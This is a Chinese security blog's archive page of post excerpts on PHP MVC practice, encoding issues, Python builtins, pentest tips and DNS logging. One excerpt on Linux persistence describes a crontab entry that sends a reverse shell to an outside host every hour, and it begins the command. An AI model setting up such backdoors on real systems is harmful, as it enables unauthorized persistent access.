05 2016 档案
摘要:前言 算是在完成作业的前提下花了6天弄完,功能少而且存在大量bug以及安全问题,主要是练习mvc框架的构思,也算是第一次从前端设计到框架构写再到后端逻辑处理。记录一下遇到的坑点。 前端:bootstrap + jquery 后端:php 数据库:mysql 开发时的运行环境:phpstudy + w
阅读全文
摘要:win下的Dos乱码 utf 8保存的文件,在win中映射为gbk,输出文字就是乱码的,或者读取网页的时候在dos下输出,因为dos是用gbk编码,这样就容易导致出错 解决办法: 另外还有一种情况是一些软件(notepad)在保存utf 8会在文件开头插入不可见字符 可以用codecs模块来处理 p
阅读全文
摘要:__builtin__与__builtins__的区别与关系 python有一个内建模块,该模块会在python启动后,但在没有执行python代码前,会被加载到内存.即可用调用里面的函数,其中python2.x中是 ,python3.x中更名为 输出 即在python代码中我们可以直接使用这些函数
阅读全文
摘要:Linux权限维持 前言 并未深入研究backdoor是怎么写的,只是研究一下网上存在的几种后门的用法。 测试环境:centos 6.5 crontab 计划任务,永远的爱 每60分钟反弹一次shell给dns.wuyun.org的53端口 (crontab l;printf " /60 exec
阅读全文
摘要:0x01 tip: 对于企业那种,可能会在源码中看到一些虚拟主机配置后,在内网里面是使用hosts,由于没对其进行限制,可导致外网访问其内容 即修改一下本地的hosts: 0x02 tip: "jsfuck下载" 直接运行时弹框: /NO TIP/ 他的函数运行规则是,所以重在这个函数体 jsfuc
阅读全文
摘要:上计算机网络课的时候并没怎么认真听啊,导致都是很懵逼的状态,记录一下。 dns请求是通过udp实现,http请求是通过tcp完成 通过这点就可以利用套接字来实现一个小小的cloudeye http_dns_log: 一般用python自带的去接收请求log 利用 判断: 本文来自:http://zo
阅读全文